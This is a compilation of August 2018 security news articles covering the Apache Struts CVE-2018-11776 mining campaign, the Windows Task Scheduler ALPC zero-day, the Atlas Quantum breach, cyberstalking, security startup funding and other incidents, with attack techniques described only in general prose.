“We identified one advertiser from the newly suspended set that ran $30 in ads in 2017. Those ads did not target the U.S. and the billing address was located outside of Iran. We remain engaged with law enforcement and our peer companies on this issue,” Twitter also said.

In June, Twitter announced a new process designed to improve the detection of spam accounts and bots and also revealed updates to its sign-up process to make it more difficult to register spam accounts. In early August, Duo Security announced a new tool capable of detecting large Twitter botnets.

Experts published a PoC code for Intel Management Engine JTAG flaw
29.8.2018 securityaffairs

A group of security researchers has published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.
A team of security researchers has published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The Intel Management Engine consists of a microcontroller that works with the Platform Controller Hub chip, in conjunction with integrated peripherals, it is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts warned in the past of the risks for Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

The flaw was patched, but the team composed of Mark Ermolov, Maxim Goryachy, and Dmitry Sklyarov, has devised a walkthrough for accessing the Joint Test Action Group (JTAG) feature implemented in the Intel’s Management Engine (IME).

JTAG feature provides debugging access to the processor via special USB 3.0 debugging connectors.

“A special USB 3.0 debugging connector is also necessary, though those who enjoy hacking hardware can make their own by isolating the D+, D-, and Vcc contacts on a USB 3.0 Type A Male to Type A Male cable.” reported ElReg.

The PoC incorporates the work of Dmitry Sklyarov, another researcher from the company.

The exploitation of the flaw is not simple, it requests the physical access via USB to the device.

In May 2107, security experts discovered a critical remote code execution (RCE) vulnerability, tracked as CVE-2017-5689, in the remote management features implemented on computers shipped with Intel Chipset in past 9 years.

The vulnerability affected the Intel Management Engine (ME) technologies such as Active Management Technology (AMT), Small Business Technology (SBT), and Intel Standard Manageability (ISM) and could be exploited by hackers to remotely take over the vulnerable systems.

The Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts discovered that the security framework was developed by the US National Security Agency … yes the NSA!

In November Intel issued a security patch for the JTAG vulnerability (INTEL-SA-00086) and in February 2018 it issued a new update for the fix. The vulnerability allowed an attacker to execute arbitrary and unsigned code by using the PoC code to activate JTAG for the IME core.

The PoC was working on a Gigabyte Brix GP-BPCE-3350C, (Intel Celeron-based compact PC), the experts now note that now it should work on other Intel Apollo Lake-based PCs.

The exploitation of the flaw also requires the availability of the TXE firmware version and a utility called Intel TXE System Tools that is not available only to some of Intel OEM partners.

Cryptocurrency Platform Atlas Quantum hacked, 260k users impacted
29.8.2018 securityaffairs Cryptocurrency

The Cryptocurrency Platform Atlas Quantum suffered a security breach, information belonging to more than 260,000 users was stolen by hackers.
Hackers stole information related to over 260,000 users of the Cryptocurrency Platform Atlas Quantum. Exposed data includes customer names, phone numbers, and email addresses, as well as customer account balances.

The platform allows users to trade the cryptocurrency in their accounts on multiple platforms in a way to maximize the profits thanks to its automated arbitrage system.

Atlas over 240,000 users and manages over $30 million in assets.

The company disclosed the security breach with a post on Facebook, it discovered the incident on Sunday evening. Atlas claims that hackers did not steal users’ funds, they only compromised the platform DB.

“We would like to point out that this is not a steal of bitcoins in custody or violation of our accounts in the exchanges. However, our customer base was exposed,” said Chief Executive Officer Rodrigo Marques in the Facebook post. “At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted.”

Cryptocurrency Platform Atlas Quantum

The company said it has immediately adopted the necessary measures to protect the archive.

“At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted,” states Atlas.

The company immediately launched an investigation that is still ongoing and temporarily disabled some feature

“Some features of the platform have been temporarily disabled, as a precaution, since we need to ensure security. We will notify you when they are reactivated,” Atlas added.

The popular cybersecurity expert Troy Hunt that operates the HaveIBeenPwned, announced to have already added to its data breach notification service 24% of 261k records.

Users of the Cryptocurrency Platform Atlas Quantum can check whether their accounts and passwords have appeared compromised through the HaveIBeenPwned service.

The incident demonstrates that cryptocurrency marketplaces are becoming privileged targets for hackers.

The Rise of an Overlooked Crime – Cyberstalking
29.8.2018 securityaffairs Crime

Cyberstalking is one of the most overlooked crimes. This is exactly why it is among the fastest growing crimes in the world. Learn all there is about cyberstalking here.
The internet has been a blessing since its inception. The very concept of globalization has come into existence just because of the internet. The world that was previously unconnected soon became a global village with different cultures and traditions linking together via the information highway.

The internet brought with it plenty of benefits, but accompanying these benefits came some evils that were previously not known of. These evils include hacking, identity theft, online surveillance, and cyberstalking.

We all know the dangers associated with hacking, identity theft, and internet surveillance, thanks to Facebook and other social networking platforms. What we’re probably not aware of is cyberstalking, which is the most disgusting and dangerous of all these threats.

The Dangers of Cyberstalking
Most of us are already aware of what cyber stalking is or have encountered real-world stalking at some point in our lives. Women tend to have had more experiences than men. Stalking in its traditional sense refers to a situation where someone is keeping an eye on you without your will or interest. While this is enough to make someone uncomfortable, stalkers do so to know more about their victim so that they can use the learnt information to blackmail their victims or take advantage from them.

Cyberstalking is not too different, except that it’s more efficient than the traditional one. Because of the internet and all of its connectivity, stalkers do not need to follow you around the neighborhood. If you’re not too careful, they can learn everything there is to know about you, without even leaving their dimly lit basements.

They do this by following you on the internet. Because of social media, it’s not too difficult to follow you around. You probably post most of your daily activities on your social media profile. You check into places, post pictures while you’re there, tell people about the movie you recently watched, and share your current mood and feelings.

Why people get targeted so easily?
All the personal information which is nowadays easily available on the internet can become the source of pleasure for any random cyber stalker. He can learn all there is to know about anyone in just a few clicks.

Most cyber stalkers are skilled hackers as well. They can hack into your social profiles and read your chats, and even post stuff from your profiles which can damage your reputation. Once an account gets compromised finding pictures from chats such as those that may have been shared with an intimate friend is cake walk.

Similarly, these hackers can hack your devices too. This means that any private data saved on your phone can be seen and taken over by the hacker. They can even hack into your webcam and watch you live, without you knowing about it.

Today, modern technology has made it much easier for hackers and other cybercriminals to hide their tracks. With a specialized cyber security tool such as a VPN, anyone can become completely anonymous and invisible online, making it impossible for anyone to detect your presence or activities.

There are many other cybersecurity services that hackers and cyber criminals use for their unfair advantage. These include proxies and remote servers that allow hackers to keep bouncing their traffic on to different servers, thereby keeping them safe from getting detected.

While cyberstalking is an issue for all genders, women are the most affected. When cyber stalkers get their desired info, they use it to blackmail the victim and force them to do special favors. Some demand money, others demand more heinous things. And there’s no end to all this blackmailing. Those who are affected even turn towards suicide just to bring an end to all this creepiness and blackmailing.

According to some recent estimations, 94% of women who use the internet have faced cyberstalking at some point in their life. Moreover, 62% of all cyberstalking victims are young women between the age of 18 and 24.

Over 20,000 cyberstalking cases get reported each year and this number keeps growing every next year. We also know that there may be an equal number of cases which never get reported due to the taboos and stigmas attached with being a victim of cyber stalking. What’s worse is that cyberstalking has been on the rise for many years. says that, cyberstalking is the fastest growing crime and at least 1 million women are cyber-stalked in the US alone. According to a report by WHOA, 60% of all cyberstalking victims are women while 40% are teenage boys and adult males.

The following are a few examples of cyberstalkers who like to prey on the innocents:

Intimate partner stalkers
These are people who refuse to believe that their relationship no longer exists. Intimate partner stalkers are emotionally abusive who want to control their partner despite their breakup. They would continue to keep a constant eye on their separated partner and continue to make them feel extremely uncomfortable, violated, and scared.

Delusional stalkers
These are people who may suffer from major mental illnesses such as schizophrenia, manic-depression, or erotomania. They believe that the victim is in love with him/her and that they are in a relationship even though the victim has no clue about this imaginary relationship. Other delusional stalkers believe that if they pursue the person long enough, the victim would eventually give up and fall in love.

Vengeful stalkers
These people are motivated by vengeance. Vengeful stalkers have a cause to be angry with their victims. Vengeful stalkers are often targeted by members of their university or college faculty/staff. Some of these are psychopaths, while others are delusional and believe that they are the victims even though they’re not. Vengeful stalkers stalk to get even.

The Lack of Awareness…
What’s worse about cyberstalking is that there is virtually no awareness on it. Those who are affected by this issue do not know how to deal with it. This is because most victims prefer to stay quiet to save their name and their reputation. Others can’t even find the right platforms to raise their voice and find the right kind of help.

However, there are businesses and organizations that are standing up against cyberstalking and are using their resources and their knowledge to help the victims. Cyberstalking is a menace but it can be dealt with if proper precautions are followed. You can follow some important precautions mentioned here and stay safe from cyberstalking.

Lacework Raises $24 Million to Expand Cloud Security Business
29.8.2018 securityweek IT

Mountain View, Calif-based Lacework has closed a $24 million Series B funding round with Sutter Hill Ventures, bringing the total raised, including Series A early stage venture funding, to $32 million.

The company was founded in 2015 by Sanjay Kalra (chief strategy officer) and Vikram Kapoor (CTO). Stefan Dyckerhoff, MD at Sutter Hill Ventures, is CEO.

The new funding will be used to accelerate Lacework's sales and marketing efforts. "The product became available about a year ago," Dyckerhoff told SecurityWeek; "and with minimal sales and marketing we have achieved thirty happy customers with more in the pipeline. It's time to rev up our sales and marketing efforts."

Lacework is a SaaS platform designed to enable security in public cloud implementations "automatically, at speed, end-to-end, and with scale," he explained. "So, just like you're doing DevOps and automation on the development side in the public cloud, we think we have built a platform that can achieve the same thing on the security side while maintaining a very high degree of efficacy."

As soon as the product is deployed, it starts to automatically discover the customer's environment. It tells the customer what parts of the environment are in compliance and what is out of compliance. It detects things that shouldn't be happening, and helps the customer to remediate them.

It is not a complete security product in itself, but a platform that enables the customer to do security properly and at scale. For example, it doesn't operate like a CASB -- it doesn't locate rogue storage accounts operated by staff on shadow IT. It does, however, monitor and record everything that happens on the client's cloud account. "We do see is misuse or rogue use of existing S3 buckets," explained Dyckerhoff.

Sometimes, this can include employees using what's available just because it's easy. "For example," he continued, "if developers know an account exists, would you really know if they fired up a new AWS Region in Japan over the weekend? The answer is probably 'no' -- unless you use a tool like Lacework."

Lacework sees everything that happens within the cloud account. "We have found attacks in this same category," said Dyckerhoff. "We detected live instances of bitcoin mining in one of our customers where the compromised credential of a developer was used to fire up a different Region to do bitcoin mining. With conventional tools there would have been no way to catch that. So, we don't help with small accounts set up by the employee with his own funds; but for misuse of the corporate account, we absolutely catch everything."

It is the ability to see everything that happens that gives Lacework the capacity to monitor compliance. Where regulations are mature -- such as PCI and HIPAA-- it is able to deliver traffic-light compliance reports immediately. GDPR is a little different because the regulation is so new and enforcement practices are still unknown. Nevertheless, Lacework's ability to continuously monitor the entire cloud account can highlight moments when the company does or is in danger of slipping out of GDPR compliance.

"Right now," he suggests, "the key questions for GDPR compliance are 'where is my data?' and 'who accessed it?'. These are questions that can absolutely be answered by Lacework."

Assuming the company knows where its GDPR-sensitive data is stored, Lacework will discover every API call made within the account. "We know every S3 bucket and which API called it," explained Dyckerhoff. "We keep that data over time. But we also map out the applications. So, once we are fully deployed we will know exactly which process talked to which other process, how that relates to an API call, and whether it resulted in an S3 transaction or a network transaction."

The customer gets all these records, and can see if there is an API call to a location storing EU PII that did not come from another EU location. "For GDPR," he continued, "you must not miss a single transaction -- and that's what we provide. The customer still needs to know what is his GDPR data and where it is stored; but from then on, we can show all legitimate and illegitimate access to that data, demonstrating whether his storage data is in compliance or out of compliance with GDPR."

Dyckerhoff believes that the cloud marketplace is accelerating rapidly. "Over the last 12 months," he said, "cloud has progressed from early adopters to early mainstream adopters. A better understanding of the 'shared responsibility' security model is emerging. Our platform assumes the cloud is there. We have all the APIs and data sources that allow us to do automated discovery and analysis and gives the customer the tools to use the cloud securely.

"The cloud is certainly no less secure than on-prem; but it's very different. The cloud is secure if you make it secure; but you have to think about it in a new way. Lacework helps to do that."

In May 2018, Gartner include Lacework in its '5 Gartner Cool Vendors in Cloud Security -- 2018.' It said, "Lacework addresses the challenges enterprises face via their Polygraph technology. Polygraph combines cloud resource monitoring, data collection and correlation, and strong visualization. Lacework also provides threat insights into cloud environments as well as security automation tools."

Critical Apache Struts Vulnerability Exploited in Live Attacks
29.8.2018 securityweek

A Critical remote code execution vulnerability in Apache Struts 2 that was patched last week is already being abused in malicious attacks, threat intelligence firm Volexity warns.

The flaw affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Tracked as CVE-2018-11776, the bug is rather trivial to exploit: because Apache Struts doesn’t properly validate namespace input data, an attacker would only need to insert their own namespace as a parameter in an HTTP request.

Neither the Apache Software Foundation – which announced the availability of patches on August 22 – nor Semmle – the code analysis company that reported the bug in April – provided technical details, but a proof-of-concept (PoC) exploit for the vulnerability was published within days.

Now, Volexity says they have observed the first malicious campaign targeting the vulnerability. The attacks apparently started shortly after the PoC was released.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner. The initial observed scanning originated from the Russian and French IP addresses and,” the security firm reveals.

The observed exploit attempts to retrieve a copy of CNRig Miner from Github (saves it as xrig) and a shell script from BitBucket by performing wget requests to the URLs the two pieces of code reside at.

Among other actions, the shell script removes specific processes, deletes previous instances of the miner, and downloads three ELF cryptomining binaries. These are miner executables targeting Intel, ARM, and MIPS architectures, which shows the broad scope of the attack.

“[I]t shows the miner is capable of running across a wide range of hardware, such as servers, desktops, laptops, IOT devices, wireless routers, and more — nearly any internet connected device running a vulnerable instance of Apache Struts,” Volexity points out.

The BitBucket folder appears to be an open directory that contains both the shell script and the ELF binaries. Mining account name is the same as the BitBucket account name, the security firm says.

Apache Struts framework’s popularity makes it a highly appealing target to cybercriminals and threat actors alike, and it’s no surprise that the recently addressed bug is already being abused for malicious purposes.

A Critical remote code execution flaw addressed in the framework in March 2017 was still being targeted one year later, SANS Internet Storm Center handler Guy Bruneau reported several months ago.

Hackers Breach Cryptocurrency Platform Atlas Quantum
29.8.2018 securityweek Cryptocurrency

260,000 Impacted in Cryptocurrency Investment Platform Breach

The information of over 260,000 users was stolen after hackers managed to compromise the cryptocurrency investment platform Atlas Quantum.

Through this platform, users can add Bitcoin to their accounts and make profits by trading the cryptocurrency on various platforms. Atlas says it uses an automated arbitrage system to yield profits for customers based on real-time movements in the cryptocurrency market.

The company says it has over 240,000 users in more than 50 countries and over $30 million in assets under its management. In 2017, the platform delivered a cumulative 38% return to investors, Atlas claims.

In an announcement made on Facebook, the company revealed that it became aware of a data breach on Sunday evening and that, although no funds were stolen, its customers database was compromised.

According to a tweet from HaveIBeenPwned, the service that allows users to check whether their accounts and passwords have appeared in any data breaches, the stolen data set had over 261,000 entries.

The leaked information apparently includes affected individuals’ names, phone numbers, and email addresses, as well as their account balances.

“At the time of the incident, we took immediate steps to protect the database and passwords and private keys remain encrypted,” Atlas says.

The investigation into the incident is ongoing, but the company also notes that, in addition to monitoring the affected accounts, they are working to add more protections against fraud.

“Some features of the platform have been temporarily disabled, as a precaution, since we need to ensure security. We will notify you when they are reactivated,” Atlas says.

“The Atlas Quantum data breach suggests that crypto services remain a high-profile target for hackers. Even those who do not actively use the platform to store or invest in crypto may have had their personal data exposed,” Bitglass CTO Anurag Kahol told SecurityWeek in an emailed comment.

“For companies like Atlas, that store mass amounts of user data, reputation and user data security are closely tied. Quickly identifying the cause of this breach and mitigating the threat of further data loss is a critical next step for Atlas and prevention should be top of mind for all companies that store high-value data,” Kahol continued.

The incident should be a wakeup call for cryptocurrency platforms, which are increasingly targeted by cybercriminals, Jonathan Bensen, Director of Product Management/ Acting CISO, Balbix, pointed out to SecurityWeek in an emailed commentary.

Man Accused of Hacking Into Bank Account, Stealing $300,000
29.8.2018 securityweek Hacking

HARTFORD, Conn. (AP) — Police have arrested a Connecticut man they allege hacked into someone's retirement account and stole more than $300,000.

Hartford police say 36-year-old Kwadjo Osei-Wusu, of Manchester, was arrested Friday and charged with money laundering, larceny and conspiracy to commit identity theft.

Police say the FBI began investigating fraudulent activity on the Wells Fargo account in March.

Authorities say the account was compromised in 2014, and more than $300,000 was stolen and then deposited in several fraudulent bank accounts.

The stolen funds were then withdrawn as cashier checks, cashed and turned over to Osei-Wusu.

Police say the scheme involved "sophisticated levels of cyber hacking."

Osei-Wusu was held on $450,000 bond pending a Tuesday court appearance and could not be reached. No attorney was listed for him in online judicial records.

Industrial Cybersecurity Firm Indegy Raises $18 Million
29.8.2018 securityweek ICS

Industrial cybersecurity firm Indegy on Tuesday announced that is has raised $18 million through a Series B funding round, bringing the total amount raised by the company to $36 million. The new funding adds to a $12 million Series A round announced by the company in July 2016.

Indegy offers a platform that protects industrial control systems (ICS) from cyber, insider and operator error (non-malicious intent) threats, by providing visibility into ICS networks and identifying changes to controllers that could indicate an attack, including changes to firmware, logic, and configuration updates.

"This capital infusion provides the financial resources required to scale up the company and capitalize on this market opportunity," said Barak Perelman, CEO of Indegy.

Indegy at SecurityWeek's ICS Cyber Security Conference
Indegy Exhibits at SecurityWeek's 2017 ICS Cyber Security Conference in Atlanta (Image Credit: SecurityWeek)
In May, the company launched a risk assessment service designed to help organizations evaluate exposures in their operational technology (OT) environments.

In addition to announcing its Series B financing, the company announced the appointment of two new executives to its management team: Joe Scotto as Chief Marketing Officer, who joined from BAE Systems, and former Imperva executive, Todd Warwick, who will serve as VP of Sales for the Americas.

The Series B round was led by Liberty Technology Venture Capital, with participation from energy and services firm Centrica plc, O.G. Tech Ventures and existing investors Shlomo Kramer, Magma Venture Partners, Vertex Ventures and Aspect Ventures.

Perelman will be presenting on addressing insider threats in OT environments at SecurityWeek’s 2018 ICS Cyber Security Conference in October.

Indegy is one of several security startups targeting the industrial space that have recently raised funding. Others include Nozomi Networks, Dragos, Bayshore Networks, CyberX, Claroty, and SCADAFence. Veteran industrial software firm PAS raised $40 million in April 2017. Darktrace, which has an offering targeted to the industrial sector, raised $75 million at a valuation of $825 million in July 2017.

Telegram Says to Cooperate in Terror Probes, Except in Russia
29.8.2018 securityweek
Social  BigBrothers

The Telegram encrypted messenger app said Tuesday said it would cooperate with investigators in terror probes when ordered by courts, except in Russia where it is locked in an ongoing battle with authorities.

The company founded by Russian Pavel Durov has refused to provide authorities in the country with a way to read its communications and was banned by a Moscow court in April as a result.

But in its updated privacy settings, Telegram said it would disclose its users' data to "the relevant authorities" elsewhere if it receives a court order to do so, although not in Russia.

"If Telegram receives a court order that confirms you're a terror suspect, we may disclose your IP address and phone number to the relevant authorities," Telegram's new privacy settings said.

"So far, this has never happened. When it does, we will include it in a semiannual transparency report," the app added.

Durov said the new privacy terms were adopted to "comply with new European laws on protecting private data."

But Durov assured his Russian users that Telegram would continue to withhold their data from security services.

"In Russia, Telegram is asked to disclose not the phone numbers or IP addresses of terrorists based on a court decision, but access to the messages of all users," he wrote on his Telegram channel.

He added that since Telegram is illegal in Russia, "we do not consider the request of Russian secret services and our confidentiality policy does not affect the situation in Russia."

Durov has long said he would reject any attempt by the country's security services to gain backdoor access to the app.

Telegram lets people exchange messages, stickers, photos and videos in groups of up to 5,000 people. It has attracted more than 200 million users since its launch by Durov and his brother Nikolai in 2013.

Russia has acted to curb internet freedoms as social media has become the main way to organise demonstrations.

Authorities stepped up the heat on popular websites after Vladimir Putin started his fourth Kremlin term in 2012, ostensibly to fight terrorism but analysts say the real motive was to muzzle Kremlin critics.

According to the independent rights group Agora, 43 people were given prison terms for internet posts in Russia in 2017.

Tech companies have had difficulty balancing the privacy of users against law enforcement, with encryption of communications adding a layer of complexity to cooperating with authorities.

One of Telegram's rival apps, Facebook-owned Whatsapp, says it complies with authorities in accordance with "applicable law".

Critical Apache Struts flaw CVE-2018-11776 exploited in attacks in the wild
29.8.2018 securityaffairs

According to the threat intelligence firm Volexity, the CVE-2018-11776 vulnerability is already being abused in malicious attacks in the wild.
Just yesterday I wrote about the availability online of the exploit code for the recently discovered Critical remote code execution vulnerability CVE-2018-11776 in Apache Struts 2.

The PoC code was published on GitHub and experts were warning of the risks of massive attacks.

The CVE-2018-11776 vulnerability affects Struts versions from 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

The versions Struts 2.3.35 and 2.5.17 includes the security updates to address the CVE-2018-11776.

Struts developers also published a temporary workaround, but are recommending users to don’t use it and install the updates.

News of the day is that according to the threat intelligence firm Volexity, the flaw is already being abused in malicious attacks.

The vulnerability is trivial to exploit, it is possible to trigger the RCE flaw when namespace value isn’t set for a result defined in underlying xml configurations and at the same time, its upper action(s) configurations have no or wildcard namespace.

According to the experts from the threat intelligence firm Recorded Future, there is an intense activity related to the Struts flaw in a number of Chinese and Russian underground forums.

” Unfortunately, this makes the vulnerability trivial to exploit — in fact, proof-of-concept code has already been released, including a Python script that allows for easy exploitation. Recorded Future has also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.” reads the analysis published by Recorded Future.

“Unlike last year’s Apache Struts exploit (CVE-2017-5638), which was at the center of the Equifax breach, this vulnerability appears easier to exploit because it does not require the Apache Struts installation to have any additional plugins running in order to successfully exploit it.”

Experts warn that the CVE-2018-11776 flaw is easier to exploit compared to the CVE-2017-5638Apache Struts flaw that was exploited in the Equifax hack.

The number of potentially vulnerable application could be impressive.

Researchers from Volexity announced to have observed the first malicious campaign targeting the vulnerability just after the PoC was published online.

Threat actors are leveraging the flaw in the attempt to install the CNRig cryptocurrency miner.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner.” states the report published by Volexity.

“The initial observed scanning originated from the Russian and French IP addresses and,”

The exploit used in the attacks fetch a copy of CNRig Miner from Github (saves it as xrig) and a shell script from BitBucket by performing wget requests to the URLs the two pieces of code reside at.

The shell script removes previous instances of the miner, removes specific processes, and downloads three ELF crypto mining binaries.

Below the actions performed by the script:

Remove any processes containing the keyword rabbit.
Look for processes containing the keyword check in the name, removing it if it is not the current process.
Remove any instances of or xrig.
Download three ELF cryptomining binaries, chmod them, execute the files, and then remove them.
Remove nohup.out.
Sleep for ten minutes (600 seconds).
The miners observed in this campaign target multiple architectures, including Intel, ARM, and MIPS.

“The three ELF binaries downloaded are executables for the Intel, ARM, and MIPS architectures. This is worth noting, as it shows the miner is capable of running across a wide range of hardware, such as servers, desktops, laptops, IOT devices, wireless routers, and more — nearly any internet connected device running a vulnerable instance of Apache Struts.”continues the report from Volexity.

The BitBucket folder involved in the attack contains both the shell script and the ELF binaries. Researchers observed that the mining account name is the same as the BitBucket account name.

I have no doubt, the number of campaigns targeting the CVE-2018-11776 vulnerability will rapidly increase. There is a large number of Apache Struts 2 installs still unpatched that are exposed online.

Expert publicly disclosed exploit code for Windows Task Scheduler Zero-Day
29.8.2018 securityaffairs
Exploit  Vulnerebility

A security researcher has publicly disclosed the details of zero-day privilege escalation vulnerability affecting all Microsoft’s Windows operating systems
A security researcher who handles the Twitter account @SandboxEscaper has disclosed the details of zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems that could be exploited by a local attacker or malicious program to obtain system privileges on the vulnerable system.

Here is the alpc bug as 0day: … I don't fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit.

7:07 PM - Aug 27, 2018

Repo for random stuff. Contribute to SandboxEscaper/randomrepo development by creating an account on GitHub.
834 people are talking about this
Twitter Ads info and privacy
According to the expert who disclosed the flaw, the issue also affects a “fully-patched 64-bit Windows 10 system.”

The vulnerability resides in the Windows’ task scheduler program and ties to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

The Advanced Local Procedure Call (ALPC) is an undocumented Inter-Process Communication facility provided by the Microsoft Windows kernel for lightweight (or local) Inter-Process Communication (IPC) between processes on the same computer.

The Advanced local procedure improves high-speed and secure data transfer between one or more processes in the user mode.

Windows zero-day
SandboxEscaper posted a proof-of-concept (PoC) exploit code for the zero-day that was published on GitHub.

The vulnerability was verified by the CERT/CC analyst Will Dormann that posted the following message:

Will Dormann
I've confirmed that this works well in a fully-patched 64-bit Windows 10 system.
LPE right to SYSTEM!

Here is the alpc bug as 0day: … I don't fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit.

12:08 AM - Aug 28, 2018
132 people are talking about this
Twitter Ads info and privacy
The CERT/CC published a security advisory explaining that It could be exploited by a local user to obtain elevated (SYSTEM) privileges.

“Microsoft Windows task scheduler contains a vulnerability in the handling of ALPC, which can allow a local user to gain SYSTEM privileges. We have confirmed that the public exploit code works on 64-bit Windows 10 and Windows Server 2016 systems. Compatibility with other Windows versions may be possible with modification of the publicly-available exploit source code” reads the alert issued by the CERT/CC.

The flaw received a CVSS score of 6.4 to 6.8.
The CERT/CC confirmed that currently there is no workaround for the flaw. The Advanced Local Procedure Call (ALPC) interface is a local system, this limit the impact of the vulnerability. Experts warn of malware that could include the PoC code to gain system privileges on Windows systems.

SandboxEscaper did not report the zero-day to Microsoft, now all Windows systems are vulnerable until the Company will release security updates for its systems.

At the time of writing it is still unclear if the Windows zero-day effects all supported Windows versions, some experts, in fact, said that the PoC code doesn’t work on Windows 7.

Microsoft is expected to address the vulnerability in September security Patch Tuesday, that is scheduled for September 11.

Notorious Cybercriminal Released From Prison
29.8.2018 securityweek CyberCrime

Earlier this month, Belarusian authorities released from prison Sergey Yarets, a notorious cybercriminal and co-developer of the Andromeda botnet.

Yarets, who used the online moniker of Ar3s, was arrested in late November 2017, when Federal Bureau of Investigation (FBI) and law enforcement agencies in Europe dismantled the Andromeda botnet.

Also known as Gamarue or Wauchos, Andromeda has been around since 2011, its primary purpose being that of credential theft and malware distribution. Detected on over 1 million machines each month during the second half of 2017, the botnet had been associated with 80 malware families.

At the time of takedown, security researchers identified 464 distinct Andromeda botnets and 1,214 domains and IP addresses of command and control (C&C) servers. In January this year, ESET warned of difficult cleaning efforts for such a long-lived botnet and said Andromeda would die a slow death.

Despite Andromeda’s size (victims were identified in over 200 countries) and the considerable effort international law enforcement agencies and private organizations put into taking it down, Yarets was released on August 9, 2018.

When arrested, Yarets was charged for his involvement in the sale, maintenance, and use of Andromeda. A resident of Rechitsa, Gomel Region, Belarus, he was formerly a technical director at OJSC “Televid” Tele-Radio, threat intelligence provider Recorded Future reveals.

Opposition news agency Radio Svaboda, the only Belarusian media outlet to have reported the release, says that Yarets was ordered to pay $5,500 as retribution for the income made from the botnet, and that his apparent cooperation with the authorities was what led to his quick release.

As per Radio Svaboda Belarus’ reporting, Yarets’s lawyer “elaborated that Yarets’s extraordinary knowledge should serve the country’s interests and that there was no evidence of damage done to Belarusian citizens or organizations because Yarets did not target member countries of the Commonwealth of Independent States,” Recorded Future notes.

Yarets apparently claimed that Andromeda was created by a “genius and alcoholic” developer, supposedly the Russian threat actor waahoo. Yarets claims he received the exclusive rights of the Andromeda Trojan in 2012.

Although waahoo apparently continued to be involved in the Trojan’s development until approximately 2015, Yarets was the only one responsible for Andromeda’s operation at the time of his arrest.

“The Belarusian investigators and judges most likely knew this but did not take it into account for unknown reasons,” Recorded Future notes.

“This case is an example of a selective approach toward the punishment of cybercriminals in ex-Soviet states, allowing them to avoid just punishment when states are interested in them, diminishing the importance and efficiency of international cooperation in this field,” the security firm concludes.

Iranian Hackers Target Universities in Large Attack Campaign: SecureWorks
29.8.2018 securityweek Cyber

SecureWorks security researchers have discovered that a new, large phishing campaign targeting universities is similar to previous cyber operations by an actor associated with the Iranian government.

The campaign involved the use of sixteen domains that contained more than 300 spoofed websites and login pages for 76 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States.

Many of the spoofed domains, SecureWorks says, referenced the targeted universities’ online library systems, suggesting that the actors behind the campaign were interested in accessing those resources. Not all domains were accessible during analysis.

Victims who entered their login credentials into the fake login pages were redirected to the legitimate websites. Once there, they were either automatically logged into a valid session or asked for the login credentials again, SecureWorks explains.

Many of the domains were registered between May and August 2018, the most recent of them on August 19. Most of the identified domains resolved to the same IP address and DNS name server.

The attacks share infrastructure with a previously observed campaign associated with the Iran-linked COBALT DICKENS hackers. In March, the United States indicted the Mabna Institute and nine Iranian nationals in connection with the group’s activity between 2013 and 2017.

According to the U.S. Department of Justice, the hackers targeted the accounts of more than 100,000 university professors worldwide and managed to compromise around 8,000 of them. The actors were also said to have stolen 31 terabytes of academic data and intellectual property.

“Many threat groups do not change their tactics despite public disclosures, and analysis suggests that COBALT DICKENS may be responsible for the university targeting despite the indictments of some members,” SecureWorks says.

It is not uncommon for threat actors to target universities when looking to steal intellectual property. Not only are universities more difficult to secure compared to finance or healthcare organizations, but they are also highly attractive because they develop cutting-edge research and can attract global researchers and students, SecureWorks points out.

Exploit Published for Windows Task Scheduler Zero-Day
29.8.2018 securityweek

Details of an unpatched vulnerability in Microsoft’s Windows 10 operating system were made public on Monday, via Twitter.

Information on the bug and a link to proof-of-concept (PoC) code hosted on GitHub was posted by a security researcher who claims to be frustrated with Microsoft’s bug submission process.

The researcher’s Twitter account was no longer accessible shortly after she posted the tweet, but it’s unclear whether it was suspended or deleted. The flaw, however, has been already confirmed by security researchers, including Will Dormann, a vulnerability analyst at CERT/CC.

Will Dormann
I've confirmed that this works well in a fully-patched 64-bit Windows 10 system.
LPE right to SYSTEM!

Here is the alpc bug as 0day: … I don't fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit.

12:08 AM - Aug 28, 2018
132 people are talking about this
Twitter Ads info and privacy

The bug, Dormann notes in a CERT/CC alert, is a local privilege escalation vulnerability in the Windows Task Scheduler’s Advanced Local Procedure Call (ALPC) interface. By exploiting the flaw, a local user could obtain SYSTEM privileges.

The ALPC interface is a Windows-internal mechanism that works as an inter-process communication system.

A Windows-internal mechanism, the ALPC interface enables client processes within the OS to request information or action from server processes running within the same OS.

“Microsoft Windows task scheduler contains a vulnerability in the handling of ALPC, which can allow a local user to gain SYSTEM privileges. The CERT/CC is currently unaware of a practical solution to this problem,” the CERT/CC alert reads.

What is yet unclear, however, is whether the vulnerability impacts all supported Windows versions, including 32-bit variants. Some researchers say the published PoC doesn’t appear to work on Windows 7, for example.

The public availability of a PoC for this privilege escalation bug is expected to stir the interest of cyber-criminals, and it might not be long before weaponized versions emerge.

An attacker using spear-phishing or other social engineering techniques could trick the victim into executing a malicious app capable of exploiting the bug.
